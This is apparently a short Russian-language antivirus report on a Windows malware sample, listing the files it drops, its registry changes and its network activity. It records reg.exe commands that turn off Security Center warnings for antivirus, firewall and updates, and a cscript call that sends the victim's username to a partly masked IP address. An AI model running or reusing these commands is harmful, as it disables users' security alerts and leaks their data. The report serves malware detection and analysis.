Техническая информация
- Центр обеспечения безопасности (Security Center)
- '%TEMP%\wins.exe'
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\MAIN" /v "Extensions Off Page" /t REG_SZ /d "http://www.go###e.com.br" /f
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\internet settings" /v /t REG_DWORD /d 0x00000001 /f
- '<SYSTEM32>\cscript.exe' //nologo "%TEMP%\send31722.vbs" "http://21#.#19.158.170/go2/%USERNAME%-CRNJEUFU" ""
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN" /v "Extensions Off Page" /t REG_SZ /d "http://www.go###e.com.br" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\security Center" /v updatesdisablenotify /t REG_DWORD /d 0x00000001 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System" /v /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\dev.bat" "
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\security Center" /v firewalldisablenotify /t REG_DWORD /d 0x00000001 /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\security Center" /v antivirusdisablenotify /t REG_DWORD /d 0x00000001 /f
- %TEMP%\1.tmp\dev.bat
- %TEMP%\send31722.vbs
- %TEMP%\foto.gif
- %TEMP%\wins.exe
- '21#.#19.158.170':80
- 'localhost':1038
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''